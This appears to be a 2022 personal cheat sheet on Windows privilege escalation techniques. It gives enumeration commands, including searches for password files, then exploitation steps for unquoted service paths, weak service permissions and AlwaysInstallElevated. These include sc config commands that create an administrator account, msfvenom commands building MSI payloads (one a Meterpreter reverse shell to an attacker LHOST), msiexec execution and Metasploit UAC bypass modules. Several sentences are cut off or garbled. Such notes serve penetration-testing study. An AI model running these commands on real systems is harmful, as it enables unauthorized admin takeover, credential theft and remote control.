Privilege Escalation on Windows2022-05-04
Gather System Information
systeminfo | findstr /B /C:"OS NAME" /C:"OS Version"- check OS version
netstat -ano- check active network connections
netsh firewall show state- firewall settings
netsh firewall show config
schtasks /query /fo LIST /v- check scheduled tasks
tasklist /SVC- running processes linked to services
net start- running processes
DRIVERQUERY- installed drivers
wmic qfe get Caption,Description,HotFixID,InstalledOn
dir /s *password*- searches for files the contain 'password' in the filename.
findstr /si password *.txt- Searches for 'password' in
icacls [Directory]- check what permissions we have in a directory.
icacls(Integrity Control Access Control Lists)
- See also: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls
This vulnerability arises from the way Windows interprets a file path for Windows service binaries. File paths containing spaces should be double quoted to avoid file confusion.
To the best of my knowledge, there is no downside to quoting file paths so just always do it.
- A service with an "unquoted" binary path that includes space(s).
- Write permissions for the folder containing spaces.
- A way to reboot the system or service in order to execute the payload.
The following command can be run to list vulnerable service binaries which boot automatically at startup:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Alternatively, we can query a service directly:
sc qc [service name]
Similar to unquoted service path vulnerability, we may be modify the binary service path of a service and point it to a payload.
- Need permissions to modify the service path for a given service.
A popular tool to check for these permissions is
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
Exploiting Service Binary path to add a new user and grant administrator rights:
sc config [service name] binpath= "net user admin password /add" sc stop [service name] sc start [service name] sc config [service name] binpath= "net localgroup Administrators admin /add" sc stop [service name] sc start [service name]]
Available as a Metasploit module:
AlwaysInstallElevated is a Windows setting that allows non-privileged users to install Microsoft Windows Installer Package Files (MSI) with elevated system permissions.
We can use this feature to execute a malicious MSI installer package with admin permissions.
We need two registry entries to have been set to
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
We can generate a payload with MSFVenom:
msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi
Or alternatively, a reverse shell:
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
To execute the payload:
msiexec /quiet /qn /i C:\Users\filename.msi
/quiet- bypasses UAC
/qn- do not use GUI
/i- Perform a regular installation
Available as a Metasploit module in
This is a feature which allows Windows to be deployed without active intervention from an administrator.
When an administrator fails to clean up such an install, an XML file called "Unattend" is list on the local system. This file is a goldmine for attackers.
Unattend files are likely found in:
Note: Passwords in these files may be base64 encoded.
exploit/windows/local/bypassuac is a Metasploit Module that bypasses Uaser Access Control (UAC).
User Access Control (UAC) is a security feature on Windows that allows an administrator to have two separate access tokens; a standard user, and an admin access token.
When admin access is required the system prompts the user for approval to execute the program with the admin access token.
The Metasploit Module uses a trusted Windows Publisher Certificate to spawn a second shell with UAC turned off and will work on both x86 and x64 platforms.
- Windows Exploit Suggester
- Compares the output of
systeminfoand compares the target's patch versions against the latest version of the Microsoft vulnerability database.
- Note: The database this tool relies on went EOL in March 2017.
wmic qfe list full > hotfixes.txt systeminfo > sysinfo.txt
python windows-exploit-suggester.py --database <current-date>.xls --systeminfo sysinfo.txt --hotfixes hotfixes.txt
Windows Privilege Escalation Awesome Script (WinPEAS)
- winPEAS.exe - requires .NET framework 4.
- winPEAS.bat - all other versions of Windows.